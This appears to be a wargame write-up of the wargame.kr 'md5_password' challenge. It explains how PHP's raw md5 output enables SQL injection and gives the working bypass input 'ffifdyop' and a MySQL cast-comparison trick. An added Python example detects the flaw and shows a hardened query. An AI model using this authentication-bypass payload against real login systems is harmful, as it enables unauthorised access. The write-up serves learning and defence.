http://wargame.kr:8080/md5_password/index.php
Key source code
$ps=mysql_real_escape_string($_POST['ps']);
$row=@mysql_fetch_array(mysql_query("select * from admin_password where password='".md5($ps,true)."'"));
Note that the md5 function here is called with the extra argument true. Its syntax is:
md5(string,raw)
Parameter / Description
string: Required. The string to be hashed.
raw: Optional. Selects hexadecimal or binary output format:
TRUE - raw 16-character binary format
FALSE - default; a 32-character hexadecimal string
So if the raw (binary) MD5 of some payload has the form 口口' or '1口口, the query becomes select * from admin_password where password='口口' or '1口口'. Note that the value after or only needs to begin with a digit such as 1, 2 or 3; MySQL casts the rest of the string to a number and treats it as numeric.
The classic payload for this is ffifdyop, whose raw MD5 starts with 'or'6 followed by ] and several unprintable bytes.
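The effect described above, as an added Python example that is not part of the original writeup: it reproduces how md5($ps, true) splices raw digest bytes into the SQL string, gives a check a developer can run over inputs, and shows the hardened form (hex digest plus a bound parameter). The sample inputs are constructed for the demonstration.

```python
import hashlib

# Constructed inputs: the payload discussed on the page plus two ordinary passwords.
SAMPLES = ["ffifdyop", "password123", "hunter2"]

VULNERABLE_SQL = "select * from admin_password where password='{}'"


def raw_md5(s: str) -> bytes:
    """Equivalent of PHP md5($s, true): the 16 raw digest bytes."""
    return hashlib.md5(s.encode()).digest()


def vulnerable_query(ps: str) -> str:
    """Rebuilds the page's query. PHP concatenates the raw bytes as a byte string,
    so we decode them as latin-1 to get the same one-byte-per-character text.
    mysql_real_escape_string on $ps is irrelevant: the quote appears *after* hashing."""
    return VULNERABLE_SQL.format(raw_md5(ps).decode("latin-1"))


def breaks_out_of_quotes(ps: str) -> bool:
    """Detection check: does the raw digest contain a single quote byte (0x27)?
    Any such input terminates the string literal and alters the query structure."""
    return b"'" in raw_md5(ps)


def safe_query(ps: str):
    """Hardened form: a hex digest can only contain [0-9a-f], and the value is passed
    as a bound parameter rather than concatenated. (Returns the statement and its
    parameter tuple; executing it is left to the caller's DB driver.)"""
    return ("select * from admin_password where password=%s",
            (hashlib.md5(ps.encode()).hexdigest(),))


if __name__ == "__main__":
    for sample in SAMPLES:
        print(repr(sample), "breaks quoting:", breaks_out_of_quotes(sample))
        print("  vulnerable:", repr(vulnerable_query(sample)))
        print("  hardened:  ", safe_query(sample))
```

Even the hardened form only fixes the quoting flaw; unsalted MD5 remains unsuitable for storing passwords.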
----------------
Another approach is to find a payload whose raw hash contains '=' so that the query becomes select * from admin_password where password=''='c'. To explain: password='' evaluates to 0, and then 0='c' is true because MySQL casts 'c' to a numeric type (0) for the comparison.
mysql> select * from users where password =''='';
+-------+----------+
| name  | password |
+-------+----------+
| guest | guest    |
+-------+----------+
1 row in set (0.00 sec)
mysql> select * from users where password =''='c';
+-------+----------+
| name  | password |
+-------+----------+
| guest | guest    |
+-------+----------+
1 row in set, 1 warning (0.00 sec)
mysql> select * from users where password =''='1';
Empty set (0.00 sec)
http://mslc.ctf.su/wp/leet-more-2010-oh-those-admins-writeup/